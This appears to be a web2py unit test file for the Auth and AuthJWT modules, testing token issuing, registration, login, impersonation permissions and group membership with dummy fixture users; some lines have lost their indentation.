        self.request.folder = 'applications/admin'
        self.current = current
        self.current.request = self.request
        # fresh DB with one registered user to authenticate against
        self.db = DAL(DEFAULT_URI, check_reserved=['all'])
        self.auth = Auth(self.db)
        self.auth.define_tables(username=True, signature=False)
        self.user_data = dict(username='jwtuser', password='jwtuser123')
        # store the hashed password exactly as the auth_user validator would
        self.db.auth_user.insert(username=self.user_data['username'],
                                 password=str(
                                     self.db.auth_user.password.requires[0](
                                         self.user_data['password'])[0]))
        self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
    def test_jwt_token_manager(self):
        """A token is issued from credentials and can then refresh itself."""
        import gluon.serializers
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        # second call: authenticate with the token instead of the credentials
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
    def test_allows_jwt(self):
        """allows_jwt() populates auth.user from a valid request token."""
        import gluon.serializers
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        self.token = self.jwtauth.jwt_token_manager()
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
        @self.jwtauth.allows_jwt()
        def optional_auth():
            # inside the decorated call the authenticated user must be set
            self.assertEqual(self.user_data['username'], self.auth.user.username)
        optional_auth()
@unittest.skipIf(IS_IMAP, "TODO: Imap raises 'Connection refused'")
# class TestAuth(unittest.TestCase):
#
# def setUp(self):
# request = Request(env={})
# request.application = 'a'
# request.controller = 'c'
# request.function = 'f'
# request.folder = 'applications/admin'
# response = Response()
# session = Session()
# T = TranslatorFactory('', 'en')
# session.connect(request, response)
# from gluon.globals import current
# current.request = request
# current.response = response
# current.session = session
# current.T = T
# self.db = DAL(DEFAULT_URI, check_reserved=['all'])
# self.auth = Auth(self.db)
# self.auth.define_tables(username=True, signature=False)
# self.db.define_table('t0', Field('tt'), self.auth.signature)
# self.auth.enable_record_versioning(self.db)
# # Create a user
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# registration_key='bart',
# registration_id=''
# ))
# # self.auth.settings.registration_requires_verification = False
# # self.auth.settings.registration_requires_approval = False
#
# def test_assert_setup(self):
# self.assertEqual(self.db(self.db.auth_user.username == 'bart').select().first()['username'], 'bart')
# self.assertTrue('auth_user' in self.db)
# self.assertTrue('auth_group' in self.db)
# self.assertTrue('auth_membership' in self.db)
# self.assertTrue('auth_permission' in self.db)
# self.assertTrue('auth_event' in self.db)
#
# def test_enable_record_versioning(self):
# self.assertTrue('t0_archive' in self.db)
#
# def test_basic_blank_forms(self):
# for f in ['login', 'retrieve_password',
# 'retrieve_username',
# # 'register' # register complain about : client_side=self.settings.client_side
# ]:
# html_form = getattr(self.auth, f)().xml()
# self.assertTrue('name="_formkey"' in html_form)
#
# # NOTE: Not sure it is the proper way to logout_bare() as there is not methods for that and auth.logout() failed
# self.auth.logout_bare()
# # self.assertTrue(self.auth.is_logged_in())
#
# for f in ['logout', 'verify_email', 'reset_password',
# 'change_password', 'profile', 'groups']:
# self.assertRaisesRegexp(HTTP, "303*", getattr(self.auth, f))
#
# self.assertRaisesRegexp(HTTP, "401*", self.auth.impersonate)
#
# try:
# for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
# 'auth_membership', 'auth_permission', 'auth_group',
# 'auth_user']:
# self.db[t].drop()
# except SyntaxError as e:
# # GAE doesn't support drop
# pass
# return
#
# def test_get_or_create_user(self):
# self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
# self.db.commit()
# # True case
# self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
# 'username': 'user1',
# 'password': 'password_123'
# })['username'], 'user1')
# # user2 doesn't exist yet and get created
# self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
# 'username': 'user2'})['username'], 'user2')
# # user3 for corner case
# self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
# 'last_name': 'Simpson',
# 'email': 'user3@test.com',
# 'registration_id': 'user3',
# 'username': 'user3'})['username'], 'user3')
# # False case
# self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_login_bare(self):
# # The following test case should succeed but failed as I never received the user record but False
# self.auth.login_bare(username='bart@simpson.com', password='bart_password')
# self.assertTrue(self.auth.is_logged_in())
# # Failing login because bad_password
# self.assertEqual(self.auth.login_bare(username='bart', password='wrong_password'), False)
# self.db.auth_user.truncate()
#
# def test_register_bare(self):
# # corner case empty register call register_bare without args
# self.assertRaises(ValueError, self.auth.register_bare)
# # failing register_bare user already exist
# self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# # successful register_bare
# self.assertEqual(self.auth.register_bare(username='user2',
# email='user2@test.com',
# password='password_123')['username'], 'user2')
# # raise ValueError
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(wrong_field_name='user3', password='password_123'))
# # raise ValueError wrong email
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(email='user4@', password='password_123'))
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_bulk_register(self):
# self.auth.login_bare(username='bart', password='bart_password')
# self.auth.settings.bulk_register_enabled = True
# bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
# self.assertTrue('name="_formkey"' in bulk_register_form)
#
# def test_change_password(self):
# self.auth.login_bare(username='bart', password='bart_password')
# change_password_form = getattr(self.auth, 'change_password')().xml()
# self.assertTrue('name="_formkey"' in change_password_form)
#
# def test_profile(self):
# self.auth.login_bare(username='bart', password='bart_password')
# profile_form = getattr(self.auth, 'profile')().xml()
# self.assertTrue('name="_formkey"' in profile_form)
#
# # def test_impersonate(self):
# # # Create a user to be impersonated
# # self.auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # self.auth.add_group('impersonate')
# # self.auth.add_membership(user_id=1,
# # group_id=self.db(self.db.auth_user.username == 'bart'
# # ).select(self.db.auth_user.id).first().id)
# # self.auth.add_permission(group_id=self.db(self.db.auth_group.role == 'impersonate'
# # ).select(self.db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # self.auth.login_bare(username='bart', password='bart_password')
# # self.assertTrue(self.auth.is_logged_in())
# # # Bart impersonate Omer
# # omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
# # impersonate_form = self.auth.impersonate(user_id=omer_id)
# # self.assertTrue(self.auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
#
# # def test_impersonate(self):
# # request = Request(env={})
# # request.application = 'a'
# # request.controller = 'c'
# # request.function = 'f'
# # request.folder = 'applications/admin'
# # response = Response()
# # session = Session()
# # T = TranslatorFactory('', 'en')
# # session.connect(request, response)
# # from gluon.globals import current
# # current.request = request
# # current.response = response
# # current.session = session
# # current.T = T
# # db = DAL(DEFAULT_URI, check_reserved=['all'])
# # auth = Auth(db)
# # auth.define_tables(username=True, signature=False)
# # db.define_table('t0', Field('tt'), auth.signature)
# # auth.enable_record_versioning(db)
# # # Create a user
# # auth.get_or_create_user(dict(first_name='Bart',
# # last_name='Simpson',
# # username='bart',
# # email='bart@simpson.com',
# # password='bart_password',
# # registration_key='bart',
# # registration_id=''
# # ))
# # # Create a user to be impersonated
# # auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # auth.add_group('impersonate')
# # auth.add_membership(user_id=1,
# # group_id=db(db.auth_user.username == 'bart'
# # ).select(db.auth_user.id).first().id)
# # auth.add_permission(group_id=db(db.auth_group.role == 'impersonate'
# # ).select(db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # auth.login_bare(username='bart', password='bart_password')
# # # Bart impersonate Omer
# # omer_id = db(db.auth_user.username == 'omer').select(db.auth_user.id).first().id
# # impersonate_form = auth.impersonate(user_id=omer_id)
# # self.assertTrue(auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
class TestAuth(unittest.TestCase):
def myassertRaisesRegex(self, *args, **kwargs):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*args, **kwargs)
return getattr(self, 'assertRaisesRegex')(*args, **kwargs)
    def setUp(self):
        # minimal fake web2py request/response/session wired into current
        self.request = Request(env={})
        self.request.application = 'a'
        self.request.controller = 'c'
        self.request.function = 'f'
        self.request.folder = 'applications/admin'
        self.response = Response()
        self.session = Session()
        T = TranslatorFactory('', 'en')
        self.session.connect(self.request, self.response)
        from gluon.globals import current
        self.current = current
        self.current.request = self.request
        self.current.response = self.response
        self.current.session = self.session
        self.current.T = T
        # fresh DB with the full auth model plus a record-versioned table t0
        self.db = DAL(DEFAULT_URI, check_reserved=['all'])
        self.auth = Auth(self.db)
        self.auth.define_tables(username=True, signature=False)
        self.db.define_table('t0', Field('tt'), self.auth.signature)
        self.auth.enable_record_versioning(self.db)
        # disable verification/approval so register_bare() leaves the new
        # account immediately usable (registration_key stays empty)
        self.auth.settings.registration_requires_verification = False
        self.auth.settings.registration_requires_approval = False
        # Create a user
        # Note: get_or_create_user() doesn't seems to create user properly it better to use register_bare() and
        # prevent login_bare() test from succeed. db insert the user manually not properly work either.
        # Not working
        # self.auth.get_or_create_user(dict(first_name='Bart',
        #                                   last_name='Simpson',
        #                                   username='bart',
        #                                   email='bart@simpson.com',
        #                                   password='bart_password',
        #                                   # registration_key=None,
        #                                   #registration_id='bart@simpson.com'
        #                                   ),
        #                              login=False)
        # Not working
        # self.db.auth_user.insert(first_name='Bart',
        #                          last_name='Simpson',
        #                          username='bart',
        #                          email='bart@simpson.com',
        #                          password='bart_password')
        # self.db.commit()
        self.auth.register_bare(first_name='Bart',
                                last_name='Simpson',
                                username='bart',
                                email='bart@simpson.com',
                                password='bart_password')
def test_assert_setup(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
bart_record = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(bart_record['username'], 'bart')
self.assertEqual(bart_record['registration_key'], '')
bart_id = self.db(self.db.auth_user.username == 'bart').select().first().id
bart_group_id = self.db(self.db.auth_group.role == 'user_{0}'.format(bart_id)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == bart_group_id) &
(self.db.auth_membership.user_id == bart_id)).select().first())
# Just calling many form functions
def test_basic_blank_forms(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
html_form = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in html_form)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
# GAE doesn't support drop
pass
return
def test_get_vars_next(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
# TODO: def test_navbar(self):
# TODO: def test___get_migrate(self):
def test_enable_record_versioning(self):
self.assertTrue('t0_archive' in self.db)
    # TODO: def test_define_signature(self):
    # TODO: def test_define_table(self):
    def test_log_event(self):
        """log_event() must store an auth_event row whose description is
        %-interpolated with ``vars`` and whose user_id is the logged-in user
        (None when nobody is logged in); it must store nothing when logging
        is disabled or when description is None."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        # user logged in
        self.auth.log_event(description='some_log_event_description_%(var1)s',
                            vars={"var1": "var1"},
                            origin='log_event_test_1')
        # compare every stored column except the unpredictable id/time_stamp
        rtn = self.db(self.db.auth_event.origin == 'log_event_test_1'
                      ).select(*[self.db.auth_event[f]
                                 for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
        self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_1',
                                                'client_ip': None,
                                                'user_id': bart_id,
                                                'description': 'some_log_event_description_var1'}.items()))
        # user not logged: user_id must be recorded as None
        self.auth.logout_bare()
        self.auth.log_event(description='some_log_event_description_%(var2)s',
                            vars={"var2": "var2"},
                            origin='log_event_test_2')
        rtn = self.db(self.db.auth_event.origin == 'log_event_test_2'
                      ).select(*[self.db.auth_event[f]
                                 for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
        self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_2',
                                                'client_ip': None,
                                                'user_id': None,
                                                'description': 'some_log_event_description_var2'}.items()))
        # no logging tests: logging disabled -> event count must not change
        self.auth.settings.logging_enabled = False
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        self.auth.log_event(description='some_log_event_description_%(var3)s',
                            vars={"var3": "var3"},
                            origin='log_event_test_3')
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
        # logging enabled but description=None -> still nothing written
        self.auth.settings.logging_enabled = True
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        self.auth.log_event(description=None,
                            vars={"var4": "var4"},
                            origin='log_event_test_4')
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
        # TODO: Corner case translated description...
    def test_get_or_create_user(self):
        """get_or_create_user() returns the matching user row when one exists,
        creates the user when missing, and returns None when no usable
        identifier (email) is supplied."""
        self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
        self.db.commit()
        # True case: user1 already exists, the existing row is returned
        self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
                                                       'username': 'user1',
                                                       'password': 'password_123'
                                                       })['username'], 'user1')
        # user2 doesn't exist yet and get created
        self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
                                                       'username': 'user2'})['username'], 'user2')
        # user3 for corner case: registration_id supplied alongside username
        self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
                                                       'last_name': 'Simpson',
                                                       'email': 'user3@test.com',
                                                       'registration_id': 'user3',
                                                       'username': 'user3'})['username'], 'user3')
        # False case: empty email -> no user, None returned
        self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
        self.db.auth_user.truncate()
        self.db.commit()
    # TODO: def test_basic(self):
    # TODO: def test_login_user(self):
    # TODO: def test__get_login_settings(self):
    def test_login_bare(self):
        """login_bare() must log the user in on correct credentials and
        return a falsy value (user stays logged out) on a wrong password."""
        self.auth.login_bare(username='bart', password='bart_password')
        self.assertTrue(self.auth.is_logged_in())
        self.auth.logout_bare()
        # Failing login because wrong_password
        self.assertFalse(self.auth.login_bare(username='bart', password='wrong_password'))
        # NOTE : The following failed for some reason, but I can't find out why
        # self.auth = Auth(self.db)
        # self.auth.define_tables(username=False, signature=False)
        # self.auth.settings.registration_requires_verification = False
        # self.auth.settings.registration_requires_approval = False
        # self.auth.register_bare(first_name='Omer',
        #                         last_name='Simpson',
        #                         # no username field passed, failed with :
        #                         # ValueError('register_bare: userfield not provided or invalid')
        #                         # Or
        #                         # username='omer',
        #                         # Or
        #                         # username='omer@simpson.com',
        #                         # In either previous cases, it failed with :
        #                         # self.assertTrue(self.auth.is_logged_in()) AssertionError: False is not true
        #                         email='omer@simpson.com',
        #                         password='omer_password')
        # self.auth.login_bare(username='omer@sympson.com', password='omer_password')
        # self.assertTrue(self.auth.is_logged_in())
    def test_register_bare(self):
        """register_bare() must reject missing/duplicate/invalid credentials
        (ValueError or False) and return the new user row on success."""
        # corner case empty register call register_bare without args
        self.assertRaises(ValueError, self.auth.register_bare)
        # failing register_bare user already exist
        self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
        # successful register_bare
        self.assertEqual(self.auth.register_bare(username='user2',
                                                 email='user2@test.com',
                                                 password='password_123')['username'], 'user2')
        # raise ValueError: unknown field name
        self.assertRaises(ValueError, self.auth.register_bare,
                          **dict(wrong_field_name='user3', password='password_123'))
        # raise ValueError wrong email
        self.assertRaises(ValueError, self.auth.register_bare,
                          **dict(email='user4@', password='password_123'))
        self.db.auth_user.truncate()
        self.db.commit()
# TODO: def test_cas_login(self):
# TODO: def test_cas_validate(self):
# TODO: def test__reset_two_factor_auth(self):
# TODO: def test_when_is_logged_in_bypass_next_in_url(self):
# TODO: def test_login(self):
# TODO: def test_logout(self):
def test_logout_bare(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_register(self):
def test_is_logged_in(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
# TODO: def test_verify_email(self):
# TODO: def test_retrieve_username(self):
def test_random_password(self):
# let just check that the function is callable
self.assertTrue(self.auth.random_password())
# TODO: def test_reset_password_deprecated(self):
# TODO: def test_confirm_registration(self):
# TODO: def test_email_registration(self):
def test_bulk_register(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in bulk_register_form)
# TODO: def test_manage_tokens(self):
# TODO: def test_reset_password(self):
# TODO: def test_request_reset_password(self):
# TODO: def test_email_reset_password(self):
# TODO: def test_retrieve_password(self):
def test_change_password(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
change_password_form = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in change_password_form)
def test_profile(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
profile_form = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in profile_form)
    # TODO: def test_run_login_onaccept(self):
    # TODO: def test_jwt(self):
    # TODO: def test_is_impersonating(self):
    def test_impersonate(self):
        """impersonate() must let a user holding the 'impersonate' permission
        act as another user, and must fail with HTTP 403 (no permission) or
        HTTP 401 (unknown target user)."""
        # Create a user to be impersonated
        self.auth.get_or_create_user(dict(first_name='Omer',
                                          last_name='Simpson',
                                          username='omer',
                                          email='omer@test.com',
                                          password='password_omer',
                                          registration_key='',
                                          registration_id=''),
                                     login=False)
        self.db.commit()
        self.assertFalse(self.auth.is_logged_in())
        # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
        group_id = self.auth.add_group('impersonate')
        self.auth.add_membership(user_id=self.db(self.db.auth_user.username == 'bart'
                                                 ).select(self.db.auth_user.id).first().id,
                                 group_id=group_id)
        self.auth.add_permission(group_id=group_id,
                                 name='impersonate',
                                 table_name='auth_user',
                                 record_id=0)
        # Bart login
        # self.auth.login_bare(username='bart', password='bart_password')
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertTrue(self.auth.is_logged_in())
        bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.assertEqual(self.auth.user_id, bart_id)
        # self.session.auth = self.auth
        # self.assertTrue(self.session.auth)
        # basic impersonate() test that return a read form
        self.assertEqual(self.auth.impersonate().xml(),
                         b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
        # bart impersonate itself
        self.assertEqual(self.auth.impersonate(bart_id), None)
        self.assertFalse(self.auth.is_impersonating())  # User shouldn't impersonate itself?
        # Bart impersonate Omer
        omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
        impersonate_form = self.auth.impersonate(user_id=omer_id)
        self.assertTrue(self.auth.is_impersonating())
        self.assertEqual(self.auth.user_id, omer_id) # we make it really sure
        # the impersonation form renders the impersonated user's (read-only) record
        self.assertEqual(impersonate_form.xml(),
                         b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-mail: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
        self.auth.logout_bare()
        # Failing impersonation
        # User lacking impersonate membership
        self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
        # self.assertTrue(self.auth.is_logged_in()) # For developing test
        # self.assertFalse(self.auth.is_impersonating()) # For developing test
        self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, bart_id)
        self.auth.logout_bare()
        # Try impersonate a non existing user
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        # self.assertTrue(self.auth.is_logged_in()) # For developing test
        # self.assertFalse(self.auth.is_impersonating()) # For developing test
        self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # user with id 1000 shouldn't exist
        # Try impersonate user with id = 0 or '0' when bart impersonating omer
        self.auth.impersonate(user_id=omer_id)
        self.assertTrue(self.auth.is_impersonating())
        self.assertEqual(self.auth.impersonate(user_id=0), None)
    # TODO: def test_update_groups(self):
    def test_groups(self):
        """groups() renders the logged-in user's memberships as an HTML table."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertEqual(self.auth.groups().xml(),
                         b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
    def test_not_authorized(self):
        """Ajax requests must get HTTP 403; plain requests get the configured
        access-denied message instead of an exception."""
        self.current.request.ajax = 'facke_ajax_request'
        self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
        self.current.request.ajax = None
        self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
    def test_allows_jwt(self):
        """Without a configured JWT handler, allows_jwt() must raise HTTP 400."""
        self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
# TODO: def test_requires(self):
# def test_login(self):
# Basic testing above in "test_basic_blank_forms()" could be refined here
# TODO: def test_requires_login_or_token(self):
# TODO: def test_requires_membership(self):
# TODO: def test_requires_permission(self):
# TODO: def test_requires_signature(self):
def test_add_group(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def test_del_group(self):
bart_group_id = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(group_id=bart_group_id), None)
def test_id_group(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
# If role don't exist it return None
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def test_user_group(self):
self.assertEqual(self.auth.user_group(user_id=1), 1)
# Bart should be user 1 and it unique group should be 1, 'user_1'
    def test_user_group_role(self):
        """user_group_role() returns 'user_<id>' for the logged-in user (or a
        given user_id), and None when create_user_groups is disabled."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        user_group_role = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
                                              ).select(self.db.auth_user.id).first().id
        self.assertEqual(self.auth.user_group_role(), user_group_role)
        self.auth.logout_bare()
        # with user_id args
        self.assertEqual(self.auth.user_group_role(user_id=1), 'user_1')
        # test None: disabling create_user_groups disables the role naming
        self.auth.settings.create_user_groups = None
        self.assertEqual(self.auth.user_group_role(user_id=1), None)
    def test_has_membership(self):
        """has_membership() accepts a role name, a group_id, and/or an explicit
        user_id, both for the logged-in user and for arbitrary users."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        self.assertTrue(self.auth.has_membership('user_1'))
        self.assertFalse(self.auth.has_membership('user_555'))
        self.assertTrue(self.auth.has_membership(group_id=1))
        self.auth.logout_bare()
        self.assertTrue(self.auth.has_membership(role='user_1', user_id=1))
        self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
        # NOTE(review): the counts below are asserted EQUAL, i.e. this checks
        # that has_membership() does NOT add an auth_event row here; the
        # original comment claimed the opposite -- confirm intent.
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
    def test_add_membership(self):
        """add_membership()/del_membership() by group_id, role, or default
        positional role, for an explicit user and for the logged-in user;
        invalid groups/users must raise ValueError."""
        user = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
        user_id = user.id
        role_name = 'test_add_membership_group'
        group_id = self.auth.add_group(role_name)
        self.assertFalse(self.auth.has_membership(role_name))
        # explicit user_id, group addressed by id
        self.auth.add_membership(group_id=group_id, user_id=user_id)
        self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
        self.auth.del_membership(group_id=group_id, user_id=user_id)
        self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
        # explicit user_id, group addressed by role name
        self.auth.add_membership(role=role_name, user_id=user_id)
        self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
        self.auth.del_membership(group_id=group_id, user_id=user_id)
        self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
        # invalid group/user arguments must raise ValueError
        with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
            self.auth.add_membership(group_id='not_existing_group_name', user_id=user_id)
        with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
            self.auth.add_membership(role='not_existing_role_name', user_id=user_id)
        with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
            self.auth.add_membership(group_id=group_id, user_id=None)
        with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
            self.auth.add_membership(role=role_name, user_id=None)
        # same operations with an implicit (logged-in) user
        self.auth.login_user(user)
        self.auth.add_membership(group_id=group_id)
        self.assertTrue(self.auth.has_membership(group_id))
        self.auth.del_membership(group_id=group_id)
        self.assertFalse(self.auth.has_membership(group_id))
        self.auth.add_membership(role=role_name)
        self.assertTrue(self.auth.has_membership(group_id))
        self.auth.del_membership(group_id=group_id)
        self.assertFalse(self.auth.has_membership(group_id))
        # default usage (group_id=role_name)
        self.auth.add_membership(role_name)
        self.assertTrue(self.auth.has_membership(group_id))
        self.auth.del_membership(group_id=group_id)
        self.assertFalse(self.auth.has_membership(group_id))
        # re-adding a membership should return the existing membership
        record0_id = self.auth.add_membership(group_id)
        self.assertTrue(self.auth.has_membership(group_id))
        record1_id = self.auth.add_membership(group_id)
        self.assertEqual(record0_id, record1_id)
        self.auth.del_membership(group_id=group_id)
        self.assertFalse(self.auth.has_membership(group_id))
        with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
            self.auth.add_membership(group_id='not_existing_group_name')
        with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
            self.auth.add_membership(role='not_existing_role_name')
    def test_del_membership(self):
        """del_membership() returns the removed membership id for the
        logged-in user and requires an explicit user_id once logged out."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        user_1_role_id = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
                                 ).select(self.db.auth_membership.id).first().id
        self.assertEqual(self.auth.del_membership('user_1'), user_1_role_id)
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        # NOTE(review): counts are asserted EQUAL, so no auth_event row is
        # written here; the original comment claimed one is logged -- confirm.
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
        # not logged in test case
        group_id = self.auth.add_group('some_test_group')
        membership_id = self.auth.add_membership('some_test_group')
        self.assertEqual(self.auth.user_groups[group_id], 'some_test_group')
        self.auth.logout_bare()
        # without user_id and nobody logged in, nothing is deleted
        self.assertFalse(self.auth.del_membership('some_test_group'))
